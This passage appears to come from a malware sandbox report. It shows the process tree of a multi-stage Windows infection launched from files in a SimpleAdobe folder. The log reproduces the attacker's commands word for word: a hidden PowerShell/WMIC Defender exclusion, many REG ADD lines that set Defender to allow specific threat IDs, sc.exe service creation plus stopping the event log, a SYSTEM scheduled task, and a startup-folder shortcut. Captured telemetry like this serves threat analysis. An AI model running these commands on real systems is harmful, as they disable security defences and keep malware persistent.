        "C:\Users\Admin\AppData\Local\Temp\EBGCFBGCBF.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        
        PID:6792
        
        C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\1000006001\e5f4ef64a7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\e5f4ef64a7.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EGIDBFBFHJ.exe"
        5⤵
        
        PID:744
      - C:\Users\Admin\AppData\Local\Temp\EGIDBFBFHJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EGIDBFBFHJ.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3424
  - - C:\Users\Admin\Documents\SimpleAdobe\AqyROM64IPMHFZUpZbqd8xgH.exe
      C:\Users\Admin\Documents\SimpleAdobe\AqyROM64IPMHFZUpZbqd8xgH.exe
      4⤵
      Executes dropped EXE
      PID:4236
  - - C:\Users\Admin\Documents\SimpleAdobe\DIfmdJg10MO9MHmIeAVQyNp0.exe
      C:\Users\Admin\Documents\SimpleAdobe\DIfmdJg10MO9MHmIeAVQyNp0.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3176
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:2144
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:4676
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:5080
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:1668
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "CIFUBVHI"
        5⤵
        Launches sc.exe
        
        PID:4280
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:7084
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:6784
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "CIFUBVHI"
        5⤵
        Launches sc.exe
        
        PID:6064
  - - C:\Users\Admin\Documents\SimpleAdobe\N5p21fT8ybJlnDuVaCCCazdD.exe
      C:\Users\Admin\Documents\SimpleAdobe\N5p21fT8ybJlnDuVaCCCazdD.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2980
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5348
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5436
  - - C:\Users\Admin\Documents\SimpleAdobe\EDJoyeu8U6TzpKj3frbTDWze.exe
      C:\Users\Admin\Documents\SimpleAdobe\EDJoyeu8U6TzpKj3frbTDWze.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:220
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        5⤵
        
        PID:6956
  - - C:\Users\Admin\Documents\SimpleAdobe\Q4f_SHEDlrPHiA56qKIaPC9v.exe
      C:\Users\Admin\Documents\SimpleAdobe\Q4f_SHEDlrPHiA56qKIaPC9v.exe
      4⤵
      Executes dropped EXE
      PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\7zS7ABF.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:6192
      - C:\Users\Admin\AppData\Local\Temp\7zS836A.tmp\Install.exe
        
        .\Install.exe /bdidO "385137" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:6696
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:6568
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:6500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5356
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1788
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bsqNJSiTyoMLfdbIdy" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS836A.tmp\Install.exe\" 2Z /tNLdideeX 385137 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:6252
  - - C:\Users\Admin\Documents\SimpleAdobe\VgIvzGc67Nj9MSZyH_qAyqJQ.exe
      C:\Users\Admin\Documents\SimpleAdobe\VgIvzGc67Nj9MSZyH_qAyqJQ.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:6896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        Checks processor information in registry
        
        PID:2296
      - C:\ProgramData\KKKEBKJJDG.exe
        
        "C:\ProgramData\KKKEBKJJDG.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6612
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:6556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 292
        7⤵
        Program crash
        
        PID:7024
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FBFHDBKJEGHJ" & exit
        6⤵
        
        PID:6512
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:7008
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url" & echo URL="C:\Users\Admin\AppData\Local\VitaConnect Innovations\VitaLink.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url" & exit
  2⤵
  - Drops startup file
  PID:1108
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops startup file
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:6436
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SendNotifyMessage
    PID:808
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.0.1126599304\1846982994" -parentBuildID 20221007134813 -prefsHandle 1616 -prefMapHandle 1608 -prefsLen 21202 -prefMapSize 233583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee55a545-2db7-45ae-a9b0-fea392cabe93} 808 "\\.\pipe\gecko-crash-server-pipe.808" 1684 2e92f203e58 gpu
      4⤵
      PID:1552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.1.355788650\488713091" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 21247 -prefMapSize 233583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92aa3b2a-99ce-4ea0-b4a4-0f5f63a4e94b} 808 "\\.\pipe\gecko-crash-server-pipe.808" 2004 2e9242dca58 socket
      4⤵
      PID:5668
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.2.782823158\251503432" -childID 1 -isForBrowser -prefsHandle 2728 -prefMapHandle 2724 -prefsLen 21708 -prefMapSize 233583 -jsInitHandle 1244 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {439223fe-6bfc-4d11-900e-37e5b6386a57} 808 "\\.\pipe\gecko-crash-server-pipe.808" 2740 2e931bb5658 tab
      4⤵
      PID:6304
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.3.805610666\57773091" -childID 2 -isForBrowser -prefsHandle 3412 -prefMapHandle 3396 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1244 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {371872da-a003-4455-b9d6-320fbf35346a} 808 "\\.\pipe\gecko-crash-server-pipe.808" 3424 2e933ea4958 tab
      4⤵
      PID:908
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.4.1770278419\1581098662" -childID 3 -isForBrowser -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1244 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cb32ef0-a93e-48a9-97e2-c6736d13518c} 808 "\\.\pipe\gecko-crash-server-pipe.808" 4076 2e9349e0258 tab
      4⤵
      PID:4252
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.5.1196164899\362983518" -childID 4 -isForBrowser -prefsHandle 4640 -prefMapHandle 4636 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1244 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a557f2d3-57c1-4946-8b13-d214747137f8} 808 "\\.\pipe\gecko-crash-server-pipe.808" 4608 2e92425b858 tab
      4⤵
      PID:6040
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.6.29249008\451614181" -childID 5 -isForBrowser -prefsHandle 4780 -prefMapHandle 4784 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1244 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fceec339-7d3e-4e21-a57e-662b0b1e93e5} 808 "\\.\pipe\gecko-crash-server-pipe.808" 4772 2e935e2ed58 tab
      4⤵
      PID:4376
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="808.7.1250538458\1551364584" -childID 6 -isForBrowser -prefsHandle 5072 -prefMapHandle 5068 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1244 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfc38fc2-b09d-49eb-84f0-6662272eb34c} 808 "\\.\pipe\gecko-crash-server-pipe.808" 5080 2e935e2f958 tab
      4⤵
      PID:6440
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\dvg9f217archive3\" -ad -an -ai#7zMap11450:94:7zEvent6628
  2⤵
  PID:6640
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\dvg9f217archive3\archive\" -ad -an -ai#7zMap5358:110:7zEvent2141
  2⤵
  PID:6184

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5644

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:5348

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1564

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5456

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4472
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2736
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5844
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:6728
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5068
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6000
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2408

C:\Users\Admin\AppData\Local\Temp\7zS830C.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS830C.tmp\Install.exe xv /Kagdidb 525403 /S
1⤵
- Executes dropped EXE
PID:2888
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2752
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6716
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
